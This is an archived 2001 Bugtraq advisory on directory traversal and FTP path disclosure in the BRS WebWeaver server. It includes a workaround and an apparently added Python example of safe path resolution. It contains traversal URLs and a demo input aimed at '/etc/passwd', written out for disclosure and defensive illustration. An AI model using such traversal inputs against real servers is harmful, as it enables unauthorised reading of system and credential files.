[20508] in bugtraq
Vulnerabilities in BRS WebWeaver
daemon@ATHENA.MIT.EDU (joetesta@HUSHMAIL.COM)
Mon Apr 30 02:48:52 2001
Date: Sat, 28 Apr 2001 15:57:20 -0800
Reply-To: joetesta@HUSHMAIL.COM
From: joetesta@HUSHMAIL.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Vulnerabilities in BRS WebWeaver
Overview
BRS WebWeaver v0.63 is a combined FTP and web server available from
http://bsoutham.home.dhs.org. Vulnerabilities exist in the web
server which allow remote users to break out of the web root using
relative paths (i.e. '..', '...'). In addition, the FTP server
can be made to disclose the physical path of the FTP root.
Details
The following URLs demonstrate the problem with the web server:
http://localhost/syshelp/../[any file outside the web root]
http://localhost/sysimages/../[any file outside the web root]
http://localhost/scripts/../[any file outside the web root]
The following is an illustration of the problem with the ftp server:
>ftp localhost
Connected to xxxxxxxxxxxx.rh.rit.edu.
220 BRS WebWeaver FTP Server ready.
User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog.
Password:
230 User jdog logged in.
ftp> cd *
250 CWD command successful. "/*/" is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
c:\windows\desktop\*\*.* not found
226 File sent ok
ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec.
ftp>
Solution
The web server root traversal vulnerabilities can be prevented by removing
all user-defined aliases (i.e. 'syshelp', 'sysimages') as well as the
ISAPI/CGI alias (i.e. 'scripts'). There is no solution for the FTP root
disclosure vulnerability.
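As an added example (not code from the advisory, and not BRS WebWeaver's own code, whose source is not shown here), the following Python resolver illustrates what the Details and Solution sections imply a fixed server would do: map an alias prefix to its directory and then refuse any result that does not stay inside the web root, while also rejecting dot-only segments such as '..' and '...' before they reach the filesystem. The web root, the alias table and the request paths are constructed for illustration; real request paths would be percent-decoded before this check runs.

```python
"""Alias-aware request path resolution with a web-root containment check."""
from __future__ import annotations

import logging
import posixpath
from typing import Mapping, Optional

log = logging.getLogger("webroot-demo")

# Constructed layout: one document root plus the three alias kinds named in the
# advisory (two user-defined aliases and the ISAPI/CGI 'scripts' alias).
# Paths are POSIX-style so the example behaves the same on any platform.
WEB_ROOT = "/srv/www/root"
ALIASES: Mapping[str, str] = {
    "/syshelp": "/srv/www/root/help",
    "/sysimages": "/srv/www/root/images",
    "/scripts": "/srv/www/root/cgi",
}


def naive_resolve(request_path: str, root: str = WEB_ROOT,
                  aliases: Mapping[str, str] = ALIASES) -> str:
    """Alias mapping with no containment check (for contrast only).

    The alias prefix is swapped for its directory and the remainder is
    appended verbatim, so any '..' in the request is left for the
    filesystem to interpret.  Do not use this in a server.
    """
    for prefix, directory in aliases.items():
        if request_path == prefix or request_path.startswith(prefix + "/"):
            return directory + request_path[len(prefix):]
    return root + request_path


def is_dot_only(segment: str) -> bool:
    """True for '..', '...', '....': segments made only of two or more dots.

    '..' is the ordinary traversal token; longer runs of dots have been
    collapsed to parent directories by some Windows path handling, so the
    server refuses them instead of trusting the filesystem's interpretation.
    """
    return len(segment) >= 2 and set(segment) == {"."}


def safe_resolve(request_path: str, root: str = WEB_ROOT,
                 aliases: Mapping[str, str] = ALIASES) -> Optional[str]:
    """Map an alias, then require the physical path to stay under root.

    Returns the physical path, or None when the request must be refused
    (the caller would answer 403 or 404 without echoing any physical path).
    """
    # 1. Treat the URL path as a virtual POSIX path and refuse dot-only
    #    segments before any normalisation, so '...' cannot slip through.
    segments = [s for s in request_path.split("/") if s]
    if any(is_dot_only(s) for s in segments):
        log.warning("rejected dot-only segment in %r", request_path)
        return None

    # 2. Normalise the virtual path ('.' segments, duplicate slashes).
    virtual = posixpath.normpath("/" + "/".join(segments))

    # 3. Apply the alias table to the normalised virtual path only.
    target = root + virtual
    for prefix, directory in aliases.items():
        if virtual == prefix or virtual.startswith(prefix + "/"):
            target = directory + virtual[len(prefix):]
            break

    # 4. Containment check on the final physical path.  This also catches an
    #    alias whose directory was configured outside the web root, which is
    #    why step 1 alone is not enough.
    physical = posixpath.normpath(target)
    if physical != root and not physical.startswith(root + "/"):
        log.warning("request %r resolves outside web root", request_path)
        return None
    return physical


if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    for path in ("/syshelp/index.htm", "/syshelp/../../../etc/passwd",
                 "/sysimages/.../logo.gif", "/scripts//test.cgi"):
        print(f"{path!r:40} naive={naive_resolve(path)!r:45} "
              f"safe={safe_resolve(path)!r}")
```

Step 4 is the check the advisory's workaround (deleting every alias) achieves by other means: with no aliases, every request is joined under the root, and a containment test on the normalised result is what keeps it there. Keeping the alias feature is fine once that test exists for every alias target as well.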
Vendor Status
Blaine R Southam was contacted via <bsoutham@iname.com> on
Saturday, April 21, 2001. No reply was received.
- Joe Testa
e-mail: joetesta@hushmail.com
web page: http://hogs.rit.edu/~joet
AIM: LordSpankatron